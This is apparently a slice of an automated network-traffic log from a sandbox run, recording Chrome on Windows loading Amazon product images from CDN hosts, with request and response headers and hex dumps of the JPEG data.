                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 90 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 03 04 05 06 08 02 01 09 10 00 02 01 03 03 02 04 03 05 06 05 05 00 00 00 00 01 02 03 00 04 11 05 12 21 06 31 07 13 22 41 51 61 71 14 32 52 81 91 08 23 92 a2 b2 c1 15 16 42 82 b1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQaq2R#B
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 8f 90 ed 5d d8 7f 0d 92 94 a5 10 52 94 a0 52 94 a0 57 d0 71 5f 29 41 54 5b 4b 72 f1 ba 4c 63 68 c9 cb 0c 6e 60 c3 18 c9 0c 71 51 7e bd e1 24 17 53 cd 3b ea 11 c7 e6 3b 1c 3a 00 79 a9 4a d0 81 30 cf c3 fb d6 af d6 b2 29 4a c7 9b e4 27 16 f5 1f a5 bf 0c 4f 49 f4 3d 97 4e 19 1e 4b f8 64 df b7 76 e2 81 42 83 9c e0 af f7 ad e9 db 73 31 f8 93 51 cc 3a 06 99 36 99 f6 ab f9 dc 79 d8 54 86 3c 72 54 7a 54 9d a7 97 03 3c 95 00 56 5e f7 ae ac 2c 96 47 bb 49 54 a3 20 60 a1 4a 83 27 dd cb b1 40 9f 88 e7 b0 ab e3 e5 cc c6 f2 ea 37 e6 11 32 db 2a da f5 51 e0 94 39 c0 c0 e4 77 ee 30 07 cc f6 cd 50 d3 75 58 35 34 96 4b 73 94 49 0a e7 20 e7 d2 ae 0f 1c 72 1a b2 0f a7 45 a9 a4 b6 b3 c4 b2 c7 22 36 e8 9f ee 3e 39 00 fb f7 ae d6 ac 64 c7 35 8f 53 e1 34 bf 5b 45 bf db cd a3 ac
                                                                                                                                                                                                                                                                Data Ascii: ]RRWq_)AT[KrLchn`qQ~$S;;:yJ0)J'OI=NKdvBs1Q:6yT<rTzT<V^,GIT `J'@72*Q9w0PuX54KsI rE"6>9d5S4[E
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC559INData Raw: bf 59 88 9d b7 f3 7f 1d 67 fa bb c3 bb ee 93 b6 13 cb 71 0c e9 9e 76 ee 8c fe 8e a0 54 47 0e ac 66 72 a9 13 b1 f8 28 07 fb d5 95 6d 7a cf 50 5f 5f c4 22 ba b9 92 54 53 90 8e db 80 23 38 3f cc 7f 5a db 7c 0e d3 4d de bc 27 f6 b6 8a 57 fd 46 c1 50 de a3 7e f1 9c 49 1b a6 7f 1a 6d ae 84 fd 9e 75 7b 41 2d fd 9b 71 73 3a ab 29 f6 29 1f 75 a0 ea 1a 52 95 2a 14 a5 28 14 a5 28 14 a5 28 14 a5 28 36 2b 69 15 61 8b 24 0f 4f c6 a3 cf 13 7a be 4e 9d d3 62 92 d4 06 9a e6 e5 22 53 dc 20 c1 96 42 47 cd 14 a0 f8 16 ad 80 a8 3d c0 ab 1b fd 2a d3 52 45 8a ee 04 99 15 b2 03 2e 76 b7 6d ca 78 20 e0 e3 20 d4 69 6e c8 0b 5c f1 86 48 ed 9b 4c b7 54 9c 4a 72 f2 3c 6c 02 12 43 60 06 fb d5 1e c3 e2 56 ad 6f 77 f6 82 63 91 d4 fd e7 4c b6 7e 3b 86 1a ba 3e 5f 0a ba 6a 56 2e d6 3c fc
                                                                                                                                                                                                                                                                Data Ascii: YgqvTGfr(mzP__"TS#8?Z|M'WFP~Imu{A-qs:))uR*((((6+ia$OzNb"S BG=*RE.vmx in\HLTJr<lC`VowcL~;>_jV.<


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                142192.168.2.450020151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2649
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 37d18f23-b0de-4a15-ad77-54ae66410962
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 08 Apr 2022 09:49:41 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 25 Aug 2043 10:09:16 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1732581
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100032-IAD, cache-ewr18178-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 93 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 07 08 03 04 01 02 10 00 02 02 01 02 02 05 07 09 06 03 09 00 00 00 00 01 02 00 03 04 05 11 06 12 13 21 41 71 b1 07 14 22 31 32 51 61 08 34 42 53 72 81 a1 a2 b2 24 33 52 82 92
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!Aq"12Qa4BSr$3R
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1271INData Raw: 36 cb d8 a7 ac 0d fb 8f ae 6a 98 a5 4a f9 98 1c 4b 73 f3 6e 33 74 e0 79 d8 bb 0d c6 40 00 92 58 90 36 d8 75 99 5f b7 0a 8e 5a ca 33 17 d8 f3 86 03 61 b7 b1 ca 77 dc ee 3d 7d 43 6e c9 69 e1 cb 0d da 0f 15 5b b6 c0 e6 69 05 bd cb b9 ca 04 93 21 ac ca 36 ad 6a 4a ec 9c db 6c 14 1f 48 ee 77 23 ad be fd f6 95 8e 52 4b b4 e5 2e e6 9f 6f 0f 51 5a 6a 54 32 39 7f d9 f2 f9 b9 bb 1b a1 bb 70 3d e3 b7 b0 ee 4c cd 53 d4 26 c1 c3 1f b4 ea 28 2c 50 a1 30 75 3f 50 db 7e 8b 16 fb 01 3e f3 31 f4 f6 44 67 65 ca d8 63 2c 93 69 6d 17 e7 74 ff 00 37 e9 33 a1 38 68 fb 33 9e b4 6f 9e 51 de de 06 74 1f 0d fd 19 2a 6e fa 0b 6c 16 38 3a af 32 d4 78 c3 0b 9b 7e 4d 54 5c bd d9 b5 8b e7 86 8f 6a d6 a1 99 80 1f 19 fd 69 14 b6 3f 15 6b 2e 77 51 9d a7 60 da 10 f5 11 d1 1f 35 dd 87 61 3d
                                                                                                                                                                                                                                                                Data Ascii: 6jJKsn3ty@X6u_Z3aw=}Cni[i!6jJlHw#RK.oQZjT29p=LS&(,P0u?P~>1Dgec,imt738h3oQt*nl8:2x~MT\ji?k.wQ`5a=


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                143192.168.2.450027151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC715OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3076
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 1215fdd2-8504-4b4e-9e71-749cf8e9e384
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 08 Apr 2022 09:49:46 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Mon, 28 Mar 2044 08:10:34 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1389503
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000107-IAD, cache-nyc-kteb1890078-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 91 00 01 00 03 00 03 01 01 01 00 00 00 00 00 00 00 00 00 06 07 08 02 03 05 01 04 09 10 00 02 01 03 02 04 03 07 01 05 06 07 00 00 00 00 01 02 03 00 04 11 05 12 06 07 21 31 13 22 41 32 51 52 61 62 71 81 42 14 15 91 92 a2 08 23 33 34 63 82
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"A2QRabqB#34c
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 78 6f 4c bc d4 a6 19 10 27 91 3f ea c8 de 58 93 fd ed df dc 32 68 29 ae 78 f1 69 88 41 a1 db 65 9c 98 e4 9d 57 a9 63 de da 1f b9 6f ef 88 f9 25 79 57 9c 68 79 5f a7 59 e8 b6 30 47 3d e3 6f 7b a9 e4 62 c9 e3 76 93 0a a4 17 11 11 e0 86 2e 3f c3 35 e5 72 76 d1 f8 b3 88 ee f5 9d 4b ce 6c d8 4c df 0b 4d 3b 11 17 d9 63 c1 65 1f 42 54 2f 5e 99 6c 78 a9 25 d5 53 7c 36 ba 84 ab 32 3a e4 32 25 d3 dc 36 47 5d d9 8e 50 ff 00 58 a0 9e 68 7f da 36 6f 10 2e ab 65 1b c6 4f 59 2d 89 47 5f b2 3b 3a b7 f1 4a d2 5a 36 b5 67 ae 5a c7 7d 61 30 9a 07 ec e3 a1 04 77 57 5e e8 c3 d5 4d 45 38 bb 96 5a 27 13 a1 2d 04 50 cd dd 2e e1 8c 0c e7 b1 75 5d ab 2a 37 e1 be 16 15 9d 34 0b 7d 6f 97 9a d4 f6 d6 ce a8 92 23 89 62 93 32 c4 70 a5 e3 6f d2 1f e3 86 5f 2e e0 18 10 08 99 44 c5 66 d3
                                                                                                                                                                                                                                                                Data Ascii: xoL'?X2h)xiAeWco%yWhy_Y0G=o{bv.?5rvKlLM;ceBT/^lx%S|62:2%6G]PXh6o.eOY-G_;:JZ6gZ}a0wW^ME8Z'-P.u]*74}o#b2po_.Df
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC320INData Raw: 9c 57 13 a4 47 4e 3d 7f 58 9a 23 10 f4 cb 38 7e 95 11 2b 3c 53 ee 42 d8 bc ba 96 a3 79 fa 20 b4 09 f9 b8 75 70 3f 84 44 d6 9e a8 9f 04 70 9c 7c 29 a6 a5 92 b0 92 46 62 f3 cc 3a 09 24 60 07 4f 5d a8 00 45 a9 65 73 32 68 a5 29 40 ae 61 ce 0a f7 53 dd 48 c8 3f 70 7a 57 0a 50 46 b5 0e 0a d0 f5 22 5a e7 4d b7 66 3f ac 44 22 7f e7 4d 8d 50 db fe 4a f0 fd de 7c 21 3d b9 fa 26 f1 47 f0 95 65 ab 5e 94 d8 ce 7a 87 20 9c 75 b2 d4 11 bd c9 3c 26 3f eb 43 20 fe 8a 84 de 72 83 88 f4 f2 cd 0d b9 93 20 82 d6 b7 2a c4 8f b1 30 bf f4 56 c2 a5 4f 91 a6 31 e1 de 4e 6b 1a bd d3 c5 34 0f 61 68 a5 43 cd 2a 6c 72 3d 44 48 70 ce df 80 a2 b6 8b b6 e2 4d 70 a5 46 c2 94 a5 07 97 ad 68 56 3a ed b3 5a 6a 30 2c f1 13 9d ad d1 90 fc 51 b8 f3 23 7a 6e 52 2a 07 c3 dc 9c e1 dd 13 ce d0 1b
                                                                                                                                                                                                                                                                Data Ascii: WGN=X#8~+<SBy up?Dp|)Fb:$`O]Ees2h)@aSH?pzWPF"ZMf?D"MPJ|!=&Ge^z u<&?C r *0VO1Nk4ahC*lr=DHpMpFhV:Zj0,Q#znR*


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                144192.168.2.45001518.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC610OUTGET /images/I/61oyKtHlCaL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 13077
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 33ef716e-560f-4bd5-9001-d36c734b7108
                                                                                                                                                                                                                                                                Date: Tue, 06 Aug 2024 07:19:24 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Sat, 09 Mar 2024 17:16:36 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-658,/images/I/61oyKtHlCaL
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 07:19:24 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-658 /images/I/61oyKtHlCaL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 c42cd753c9927a74eed5ac8cd899bf30.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 20752
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: BRyC9tFEhuk4BME73aUC9tnbpZYtphNg8ZospcKrMsbRmu109lzq2w==
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC13077INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 c8 00 a2 03 01 22 00 02 11 01 03 11 01 ff c4 00 ad 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 01 02 09 10 00 02 01 02 04 04 03 05 04 07 07 03 03 05 00 00 01 02 03 04 11 00 05 12 21 06 13 22 31 07 41 51 14 32 42 61 71 15 23 91 a1 52 72 81 82 92 b1 c1 33 43
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"!"1AQ2Baq#Rr3C


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                145192.168.2.450030151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC378OUTGET /images/I/31aozKg0dqL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4298
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: ab274115-9281-49af-b25f-61d4744f5e45
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 13 Jun 2024 03:06:37 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 02:17:03 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 2679
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:43 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100024-IAD, cache-nyc-kteb1890065-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 05 01 04 08 02 09 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 00 00 00 00 47 49 12 0f f5 64 db 8a ef 12
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1XGId
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 07 fe 5b 1d eb ef 31 5f 7a c7 a1 ab 75 0a 22 26 9d 65 77 5e 9c 0b 4d e6 f3 94 e5 2f 6e d3 79 bc de 6f 37 9a 82 1b 68 74 18 b7 29 24 63 d6 fc 95 49 fe f3 8d e5 7a 75 54 92 c9 d2 9d 39 c2 70 9c 66 be c0 35 53 4e fa e8 a8 ce 13 a7 3a 73 a7 3a 52 8d 3a aa 5c d8 83 d0 da 71 9c 27 09 d3 9d 39 66 08 b1 b9 4a b1 ba 6a 14 74 e7 09 c2 71 9c 66 df e9 ff 00 ff c4 00 1e 11 00 02 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 01 11 30 12 31 02 10 21 20 50 ff da 00 08 01 02 01 01 08 00 a3 13 1b 56 c8 1c 45 a9 49 8a 21 0d 2b 38 f6 f5 62 5e 76 f5 56 2c 81 6b a8 39 6a be 23 44 10 4d 58 b2 1a 17 2e dd 29 fd 37 35 48 91 91 91 36 26 d1 04 57 07 86 44 99 1e 11 f8 7f ff c4 00 1d 11 00 03 01 00 03 00 03 00 00 00 00 00 00 00 00 00 00 01 11 30 10 12 21 31 40 50 ff da 00 08 01 03 01
                                                                                                                                                                                                                                                                Data Ascii: [1_zu"&ew^M/nyo7ht)$cIzuT9pf5SN:s:R:\q'9fJjtqf01! PVEI!+8b^vV,k9j#DMX.)75H6&WD0!1@P
                                                                                                                                                                                                                                                                2024-08-12 13:23:43 UTC1378INData Raw: 73 3b bd a1 45 2f 39 45 a4 86 58 ea 25 ae bd 0b f8 84 50 e5 6f 4d a0 ac 2e 56 a6 b1 f7 c1 28 06 e8 0e 54 cf 78 be 62 de 6f 0a 88 78 a4 02 e9 2e e7 d7 e0 84 3a d0 ec 61 76 df 59 4a 1f 21 2d 11 e4 8c 4f 52 31 5e 1d 74 08 5c e9 d3 f1 cf 08 75 80 f6 73 e4 fb da 37 0d 19 30 c8 dc 22 04 20 d6 b0 3a 76 c7 5e fb 1d d3 e9 1e e2 0b 27 61 80 ff 00 86 10 d2 5f 20 04 92 8a e1 64 9d ed 09 68 a2 83 10 55 5d 0b a6 5c 03 c2 48 91 62 8e 09 d7 12 24 10 20 66 3a 74 ad 40 fb 15 8f 33 6a 67 ec 3b 61 02 91 03 c8 ff 00 f7 b5 98 e6 e9 14 87 ab 8a 78 22 23 65 43 a6 1f 32 ae a9 b8 6b c2 20 75 41 a8 ef 0b 7c 91 7a 6f 7e 5b 92 8f f0 44 e0 c1 61 c1 f2 80 b4 b4 78 61 c0 3f e5 9b ff c4 00 29 10 01 00 02 01 02 06 01 05 01 00 03 00 00 00 00 00 01 00 11 21 31 41 40 51 61 71 81 91 a1 10 b1
                                                                                                                                                                                                                                                                Data Ascii: s;E/9EX%PoM.V(Txbox.:avYJ!-OR1^t\us70" :v^'a_ dhU]\Hb$ f:t@3jg;ax"#eC2k uA|zo~[Daxa?)!1A@Qaq
